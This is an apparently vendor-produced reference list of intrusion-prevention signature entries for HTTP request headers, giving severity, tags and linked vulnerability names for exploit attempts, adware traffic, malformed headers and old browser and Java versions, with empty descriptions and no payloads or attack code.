Tags: Windows, x86, IIS 5.0, IIS 4.0, MS2002, CVE2002, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability
Description:
Back to top

HTTP_CSH-iMatix-Corporation-Xitami-Web-Server-BOF

About this situation: Buffer overflow in iMatix Corporation Xitami Web Server
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Imatix Xitami for Windows, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-643-5211
Vulnerability: iMatix-Corporation-Xitami-Web-Server-BOF
Description:
Back to top

HTTP_CSH-iMesh-Toolbar-Popup-Content-Request

About this situation: iMesh Internet Explorer toolbar popup content request detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, iMesh Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: iMesh-Toolbar
Description:
Back to top

HTTP_CSH-iMesh-Toolbar-Search

About this situation: iMesh Internet Explorer toolbar search detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, iMesh Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: iMesh-Toolbar
Description:
Back to top

HTTP_CSH-Incredifind

About this situation: IncrediFind traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, IncrediFind, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Incredifind
Description:
Back to top

HTTP_CSH-Internet-Explorer-10.x-Browser-Compatibility-Mode-Usage

About this situation: Usage of Internet Explorer 10.x browser in compatibility mode detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer 10.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-10.x-Browser-Usage

About this situation: Internet Explorer 10.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer 10.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-11.x-Browser-Compatibility-Mode-Usage

About this situation: Usage of Internet Explorer 11.x browser in compatibility mode detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Internet Explorer 11.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-732-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-11.x-Browser-Usage

About this situation: Internet Explorer 11.x browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Internet Explorer 11.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-658-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-2.x-Browser-Usage

About this situation: Internet Explorer 2.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-658-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-3.x-Browser-Usage

About this situation: Internet Explorer 3.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-658-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-4.x-Browser-Usage

About this situation: Internet Explorer 4.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-658-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-5.x-Browser-Usage

About this situation: Internet Explorer 5.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-658-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-6.x-Browser-Usage

About this situation: Internet Explorer 6.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-658-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-7.x-Browser-Usage

About this situation: Internet Explorer 7.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-732-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-8.x-Browser-Compatibility-Mode-Usage

About this situation: Usage of Internet Explorer 8.x browser in compatibility mode detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer 11.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-8.x-Browser-Usage

About this situation: Internet Explorer 8.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer 8.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-9.x-Browser-Compatibility-Mode-Usage

About this situation: Usage of Internet Explorer 9.x browser in compatibility mode detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer 9.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-9.x-Browser-Usage

About this situation: Internet Explorer 9.x browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Internet Explorer 9.0, Any Operating System not specific, Major Browser Versions, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-Browser-Plugin-Usage

About this situation: Internet Explorer browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internet-Explorer-Browser-Usage

About this situation: Internet Explorer browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Internetoptimizer

About this situation: InternetOptimizer traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, InternetOptimizer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Internetoptimizer
Description:
Back to top

HTTP_CSH-Invalid-Ascii-In-HTTP-Header

About this situation: Invalid character in HTTP header detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, CVE2015, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-797-5211
Vulnerability: Eclipse-Foundation-Jetty-Web-Server-Httpparser-Remote-Information-Disclosure
Description:
Back to top

HTTP_CSH-Invalid-Authorization

About this situation: Invalid looking authorization
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-340-4219
Description:
Back to top

HTTP_CSH-Invalid-Base64-Cookie

About this situation: Invalid Base64-encoded cookie detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1644-5242
Vulnerability: Invalid-Base64-Cookie
Description:
Back to top

HTTP_CSH-Invalid-Basic-Authentication-Base64

About this situation: Invalid Characters in HTTP Basic Authentication detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1273-5242
Vulnerability: Invalid-Basic-Authentication-Base64
Description:
Back to top

HTTP_CSH-Invalid-Host-Header

About this situation: An invalid host header was seen
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-782-5211
Description:
Back to top

HTTP_CSH-Invalid-HTTP-Request-Header-Field

About this situation: Detected an invalid HTTP header
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-530-5211
Vulnerability: HTTP-Apache-Memory-Consumption-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Invalid-Negative-Content-Length-Value

About this situation: Detects invalid, negative Content-Length values in HTTP headers.
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Software, CVE2005, CVE2008, CVE2020, Any Operating System not specific, Any Software not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-1589-5242
Vulnerability: HTTP-SUSE-Linux-Enterprise-Server-Remote-Manager-Content-Length-BOF
Computer-Associates-iGateway-Content-Length-Buffer-Overflow
Generic-Symantec-AntiVirus-Scan-Engine-Buffer-Overflow-Vulnerability
Novell-eDirectory-HTTP-Request-Content-Length-Heap-Buffer-Overflow
Progea-Movicon-Negative-Content-Length-Buffer-Overflow
Intel-AMT-And-ISM-Privilege-Escalation-CVE-2020-8758
Description:
Back to top

HTTP_CSH-IP-Address-As-HTTP-Host

About this situation: IP address as HTTP host
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Anomalies, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1641-5242
Vulnerability: IP-Address-As-HTTP-Host
Description:
Back to top

HTTP_CSH-ISR-Stealer-C2-Traffic

About this situation: ISR Stealer traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: ISR-Stealer-C2-Traffic
Description:
Back to top

HTTP_CSH-ISTBar-Activity

About this situation: Detects ISTBar Internet Explorer Toolbar Activity
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ISTBar Internet Explorer Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-615-5211
Vulnerability: ISTBar-Internet-Explorer-Toolbar
Description:
Back to top

HTTP_CSH-ISTBar-Install

About this situation: ISTBar Install detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ISTBar Internet Explorer Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: ISTBar-Internet-Explorer-Toolbar
Description:
Back to top

HTTP_CSH-ISTBar-Popup-Instructions-Download

About this situation: ISTBar advertisment popup instruction download detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ISTBar Internet Explorer Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-615-5211
Vulnerability: ISTBar-Internet-Explorer-Toolbar
Description:
Back to top

HTTP_CSH-Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Services Appliance detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Ivanti Cloud Services Appliance, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection
Description:
Back to top

HTTP_CSH-Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457
Description:
Back to top

HTTP_CSH-Java-6-Usage

About this situation: Java 1.6.x usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0-Usage

About this situation: Java 6 version 1.6.0 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_01-Usage

About this situation: Java 6 version 1.6.0_01 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_02-Usage

About this situation: Java 6 version 1.6.0_02 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_03-Usage

About this situation: Java 6 version 1.6.0_03 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-508-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_04-Usage

About this situation: Java 6 version 1.6.0_04 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_05-Usage

About this situation: Java 6 version 1.6.0_05 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_06-Usage

About this situation: Java 6 version 1.6.0_06 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_07-Usage

About this situation: Java 6 version 1.6.0_07 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_08-Usage

About this situation: Java 6 version 1.6.0_08 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_09-Usage

About this situation: Java 6 version 1.6.0_09 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_10-Usage

About this situation: Java 6 version 1.6.0_10 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_11-Usage

About this situation: Java 6 version 1.6.0_11 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_12-Usage

About this situation: Java 6 version 1.6.0_12 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_13-Usage

About this situation: Java 6 version 1.6.0_13 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_14-Usage

About this situation: Java 6 version 1.6.0_14 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_15-Usage

About this situation: Java 6 version 1.6.0_15 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_16-Usage

About this situation: Java 6 version 1.6.0_16 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_17-Usage

About this situation: Java 6 version 1.6.0_17 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_18-Usage

About this situation: Java 6 version 1.6.0_18 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_19-Usage

About this situation: Java 6 version 1.6.0_19 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_20-Usage

About this situation: Java 6 version 1.6.0_20 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_21-Usage

About this situation: Java 6 version 1.6.0_21 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_22-Usage

About this situation: Java 6 version 1.6.0_22 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_23-Usage

About this situation: Java 6 version 1.6.0_23 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-6-Version-1.6.0_24-Usage

About this situation: Java 6 version 1.6.0_24 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Usage

About this situation: Java 1.7.x usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_01-Usage

About this situation: Java 7 version 1.7.0_01 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_02-Usage

About this situation: Java 7 version 1.7.0_02 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_03-Usage

About this situation: Java 7 version 1.7.0_03 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_04-Usage

About this situation: Java 7 version 1.7.0_04 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_05-Usage

About this situation: Java 7 version 1.7.0_05 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_06-Usage

About this situation: Java 7 version 1.7.0_06 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_07-Usage

About this situation: Java 7 version 1.7.0_07 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_09-Usage

